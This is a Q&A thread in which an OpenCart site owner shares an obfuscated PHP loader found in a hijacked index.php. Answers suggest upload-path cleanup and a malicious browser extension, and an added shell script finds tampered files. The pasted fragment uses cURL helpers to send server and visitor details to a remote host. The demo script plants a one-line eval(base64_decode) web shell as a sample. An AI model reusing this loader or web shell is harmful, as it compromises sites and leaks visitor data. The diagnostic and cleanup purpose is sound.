
I'm using OpenCart v3.0.2.0. The issue is that the index.php file of OpenCart, which is the entry point of my OpenCart website and is uploaded in the public_html directory, corrupts (the code in the index.php file changes to strange characters).
It happened twice in the last week. I don't know whether someone is hacking or something is wrong with my domain or code.
If someone can help or guide me, please let me know.
Thank you.

index.php file after corruption:

// Every string below is assembled character by character from $O, which is the
// URL-decoded value of $OOOOOO (its definition is not in the pasted fragment).
global $O; $O=urldecode($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65].$O[67].$O[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O[67].$O[65].$O[63].$oOooOO.$O[63];
// GET helper: fetch a URL with cURL and return the body.
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){$ooooOOOooOo=curl_init();curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $oooooOOOOooO; }
// POST helper: send $OOOoooo as form fields to a URL; returns false on a cURL error.
function ooOOoOOO($OooooO,$OOOoooo=array()){global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, "$OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO,CURLOPT_POSTFIELDS, http_build_query($OOOoooo));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOoooOO){return false;}return $OOOOooo;}
// Two case-insensitive regex checks; the patterns are again built from $O characters.
function oooOOOo($ooOOo){global $O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8].$O[18];if ($ooOOo!=''){if (preg_match("/($oooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}return $ooOOOOo;}
function oooOOooOOoOO($oOOOOOOoOOOO){global $O;$ooOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO)) {$ooOOOOOOoO=true;}return $ooOOOOOOoO;}
// Scheme selection and $_SERVER lookups, with the key names assembled from $O.
$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[8].$O[13].$O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62].$O[63].$O[63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63]);
$oOoooOOoOO=$_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];
$ooOOoooOOoOO=$_SERVER[$O[41].$O[30].$O[30].$O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];
$ooOOOoooOOoOO=$_SERVER[$O[35].$O[41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];
$ooOOOOoooOOOoOO=$_SERVER[$O[37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50].$O[36].$O[51].$O[28]];
$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;
// Several URLs derived from the string in $oOooOOoO.
$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$O[24].$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[9];
$ooooOOOOoooOOOooO=$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15].$O[9];
$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$O[9].$O[15].$O[9];
$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[12].$O[11].$O

2 Answers


  1. Yep, you're right! Someone hacked your store and uploaded a virus.
    Please check the store upload directory storage/download; maybe you have strange files such as 6234sdhsd.ocmod.zip or something like that.

    I'm sure that the virus was uploaded via the catalog/controller/tool/upload.php file. So if you don't need this function, you can comment out all of this logic and return an empty JSON answer like:

    $json = '';
    $this->response->addHeader('Content-Type: application/json');
    $this->response->setOutput(json_encode($json));
    

    After that, you must delete strange files such as images.phpbbfcode.php with an encrypted body.

    Check all of these paths:

    • admin/ (language/controller)
    • catalog/ (language/controller)
    • system/ (all modifications, if you have any, as ocmod.xml)
    • system/library

    Check all of those paths. If you have backups, it will be less hard to compare files.

  2. I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into PHP files when uploading any PHP files through the browser (like cPanel's File Manager). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using the cURL function in PHP.

    To resolve this issue, you can take the following steps:

    1- Take a screenshot of all the extensions used in the browser to upload files to the server, share it with us, and then remove the browser or all its extensions.

    2- Check all files that were uploaded or updated to the server from the date of the hacking incident. You can run a command on the server to get a list of new or updated files, depending on your operating system.

    3- You may find some *.php files in the .well-known or other hidden folders on the server.

    4- Protect your operating system with an antivirus. I recommend using a non-free antivirus like Kaspersky.

    Could you please share a screenshot of your browser extensions so that we can determine which extension might be causing the website hacks?

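The file-system checks both answers recommend (look in storage/download and other upload paths for stray files, list files changed since the incident, look for PHP in .well-known and similar hidden folders, and compare the live tree against a clean copy) as one added shell example. This is not code from either answer or from OpenCart: it builds a constructed sample tree in a temporary directory, and the LIVE/CLEAN paths, the planted file names, and the indicator regex (assembled from markers visible in the pasted index.php, namely urldecode($...), $O[NN] character indexing and curl_init, plus eval/base64_decode as common companions) are all assumptions to adjust for a real site.

```shell
#!/bin/sh
# Added triage example for a tampered OpenCart docroot (not from the thread).
# Assumptions: the live site is under $LIVE, a pristine unpack of the same
# OpenCart release is under $CLEAN. Here both are constructed in a temp dir.
export LC_ALL=C   # deterministic sort order regardless of locale

# Markers that stand out in the pasted payload, plus eval/base64_decode.
INDICATORS='urldecode\(\$|\$O\[[0-9]+\]|curl_init\(|eval\(|base64_decode\('

# Files modified within the last N days (file age in whole days < N).
recent_files() {
    find "$1" -type f -mtime -"$2" | sort
}

# PHP in directories that should only hold uploads, images or ACME tokens.
# The 'for ... done | sort' pipeline ends with sort's status, so a missing
# directory is not treated as an error.
php_in_data_dirs() {
    root=$1
    for d in image storage/download system/storage/upload .well-known; do
        [ -d "$root/$d" ] && find "$root/$d" -type f \
            \( -name '*.php' -o -name '*.phtml' -o -name '*.php.*' \)
    done | sort
}

# Text files anywhere under the root that match the indicator regex
# (-I skips binaries, so a real .zip is not scanned as text).
suspicious_files() {
    grep -rIlE "$INDICATORS" "$1" | sort
}

# Compare a clean copy ($1) with the live tree ($2):
# "MODIFIED <live path>" for changed files, "ONLY_IN <path>" for extras/missing.
changed_vs_clean() {
    diff -rq "$1" "$2" | awk '
        /^Files /   { print "MODIFIED " $4 }
        /^Only in / { sub(/:$/, "", $3); print "ONLY_IN " $3 "/" $4 }
    ' | sort
}

# Constructed sample tree: a "clean" copy and a "live" copy that was tampered with.
make_demo() {
    base=$(mktemp -d)
    mkdir -p "$base/clean/image/catalog" "$base/clean/storage/download" \
             "$base/live/image/catalog"  "$base/live/storage/download" \
             "$base/live/.well-known"
    printf '<?php\n// OpenCart front controller\nrequire_once("system/startup.php");\n' \
        > "$base/clean/index.php"
    # live index.php: a cut-down imitation of the obfuscated loader from the question
    printf '<?php\nglobal $O; $O=urldecode($OOOOOO); $x=$O[15].$O[4].$O[4].$O[9];\n$c=curl_init();\n' \
        > "$base/live/index.php"
    printf '<?php eval(base64_decode($_POST["c"]));\n' \
        > "$base/live/image/catalog/images.phpbbfcode.php"
    printf '<?php echo 1;\n' > "$base/live/.well-known/x.php"
    printf 'PK\003\004 not really a zip\n' > "$base/live/storage/download/6234sdhsd.ocmod.zip"
    printf 'GIF89a\n' > "$base/clean/image/catalog/logo.gif"
    cp "$base/clean/image/catalog/logo.gif" "$base/live/image/catalog/logo.gif"
    echo "$base"
}

DEMO=$(make_demo)
LIVE=$DEMO/live
CLEAN=$DEMO/clean

echo "== files changed in the last day =="; recent_files "$LIVE" 1
echo "== php in data dirs ==";              php_in_data_dirs "$LIVE"
echo "== indicator hits ==";                suspicious_files "$LIVE"
echo "== vs clean copy ==";                 changed_vs_clean "$CLEAN" "$LIVE"
```

On a real host, point LIVE at the docroot and CLEAN at an untouched extraction of the same OpenCart version, and treat every MODIFIED core file and every ONLY_IN entry outside image/, storage/ and your own extensions as something to read by hand; the indicator grep is a shortlist, not proof, since legitimate code also calls curl_init.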